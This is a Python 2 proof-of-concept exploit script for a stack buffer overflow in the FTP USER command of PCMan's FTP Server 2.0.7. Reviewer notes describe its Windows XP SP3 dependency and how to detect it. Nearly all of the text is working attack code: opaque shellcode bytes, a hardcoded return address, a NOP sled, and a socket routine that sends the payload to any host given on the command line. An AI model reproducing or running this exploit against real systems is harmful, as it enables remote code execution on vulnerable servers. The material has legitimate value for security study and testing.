Final PCMan's FTP Server v2.0.7 Exploit
# Final PCMan's FTP Server v2.0.7 Exploit
#
# Proof-of-concept for a stack buffer overflow in the FTP USER command of
# PCMan's FTP Server 2.0.7. The script opens one TCP connection, reads the
# banner, sends a single oversized USER argument and closes the connection.
# Usage: <script> <host> <port>  (no argument validation is performed).
#
# NOTE(review): the return address used below is a fixed SHELL32.dll address
# for Windows XP SP3, so the crafted input is tied to that exact build; on any
# other build the address is unlikely to be valid and the expected outcome is
# a crash of the service rather than execution of the appended payload.
# NOTE(review): written against Python 2 semantics -- socket.send() is given a
# str containing "\x.." escapes; this is not valid as-is on Python 3.
# Detection/mitigation: the USER argument sent here is over 2000 bytes
# ("A"*2004 plus return address, NOP sled and payload), far outside any normal
# username length, which makes it an easy signature in FTP logs or on the
# wire; the underlying fix is to patch, remove or isolate the vulnerable
# service.
import sys, socket, time  # NOTE(review): `time` is imported but not used below
host = sys.argv[1] # Receive target IP from the user (argv[1], unvalidated)
port = int(sys.argv[2]) # Receive target port from the user (argv[2]; ValueError if not numeric)
# Opaque payload bytes appended after the NOP sled; their contents are not
# documented on this page beyond the author's "Shellcode" label.
buf = ""
buf += "\xda\xdf\xd9\x74\x24\xf4\x5b\xbe\xba\x06\x35\xe1\x31"
buf += "\xc9\xb1\x31\x83\xc3\x04\x31\x73\x14\x03\x73\xae\xe4"
buf += "\xc0\x1d\x26\x6a\x2a\xde\xb6\x0b\xa2\x3b\x87\x0b\xd0"
buf += "\x48\xb7\xbb\x92\x1d\x3b\x37\xf6\xb5\xc8\x35\xdf\xba"
buf += "\x79\xf3\x39\xf4\x7a\xa8\x7a\x97\xf8\xb3\xae\x77\xc1"
buf += "\x7b\xa3\x76\x06\x61\x4e\x2a\xdf\xed\xfd\xdb\x54\xbb"
buf += "\x3d\x57\x26\x2d\x46\x84\xfe\x4c\x67\x1b\x75\x17\xa7"
buf += "\x9d\x5a\x23\xee\x85\xbf\x0e\xb8\x3e\x0b\xe4\x3b\x97"
buf += "\x42\x05\x97\xd6\x6b\xf4\xe9\x1f\x4b\xe7\x9f\x69\xa8"
buf += "\x9a\xa7\xad\xd3\x40\x2d\x36\x73\x02\x95\x92\x82\xc7"
buf += "\x40\x50\x88\xac\x07\x3e\x8c\x33\xcb\x34\xa8\xb8\xea"
buf += "\x9a\x39\xfa\xc8\x3e\x62\x58\x70\x66\xce\x0f\x8d\x78"
buf += "\xb1\xf0\x2b\xf2\x5f\xe4\x41\x59\x35\xfb\xd4\xe7\x7b"
buf += "\xfb\xe6\xe7\x2b\x94\xd7\x6c\xa4\xe3\xe7\xa6\x81\x1c"
buf += "\xa2\xeb\xa3\xb4\x6b\x7e\xf6\xd8\x8b\x54\x34\xe5\x0f"
buf += "\x5d\xc4\x12\x0f\x14\xc1\x5f\x97\xc4\xbb\xf0\x72\xeb"
buf += "\x68\xf0\x56\x88\xef\x62\x3a\x61\x8a\x02\xd9\x7d"
# Return Address 0x7C9D30D7 in SHELL32.dll (Win XP SP3)
# Hard-coded, build-specific address: it is what ties this input to XP SP3.
ret = '\xD7\x30\x9D\x7C' # Packed in little endian
# NOP Padding (20 bytes of 0x90 placed between the return address and buf)
nop = '\x90'*20
# EIP Writing Pattern
pattern = "A"*2004 + ret + nop + buf # Our exploit together. Junk -> Return Address -> NOPS -> Shellcode
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((host, port)) # Connect to user supplied port and IP address (no timeout set)
client.recv(1024) # Receive the FTP banner; the reply content is discarded
client.send("USER " + pattern) # Send the USER command with the oversized argument; return value not checked
client.close() # Close the connection